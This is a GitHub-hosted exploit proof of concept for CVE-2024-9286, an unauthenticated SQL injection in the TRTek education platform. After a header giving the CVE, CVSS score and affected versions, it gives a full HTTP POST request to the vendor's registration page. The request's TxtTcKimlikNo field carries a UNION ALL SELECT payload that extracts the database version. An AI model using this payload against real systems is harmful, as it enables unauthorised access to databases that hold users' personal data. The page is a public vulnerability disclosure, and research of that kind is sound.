CVEs/CVE-2024-9286 at main · BEND0US/CVEs · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Exploit Title: TRTek Software / Education Platform SQL Injection (Unauthenticated)
# Date: 2024-10-09
# Exploit Author: Dogus DEMIRKIRAN
# Vendor Homepage: https://uzaktanegitim.trtekyazilim.com/
# Version: <3.2024.11
# Bugs:  SQL Injection
# Authentication Required: NO
# CVE: CVE-2024-9286 (https://www.cve.org/cverecord?id=CVE-2024-9286)
# CVSSv4 Score: 8.8 (/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N)
===============================================================================

# PoC:

# CVE-2024-9286

POST /Sayfalar/Uyelik.aspx HTTP/2
Host: uzaktanegitim.trtekyazilim.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Origin: https://uzaktanegitim.trtekyazilim.com
Dnt: 1
Referer: https://uzaktanegitim.trtekyazilim.com/Sayfalar/Uyelik.aspx
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

TxtTcKimlikNo='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(@@version),NULL,NULL,NULL,NULL--&TxtAd=qqq&TxtSoyad=qq&TxtEposta=qqq%40h&DrpKurum=103&DrpUnvan=392&DrpBrm=66&DrpBrans=&TxtTelefon=&TxtSifre=&BtnYeniKayit=KAYDET

===============================================================================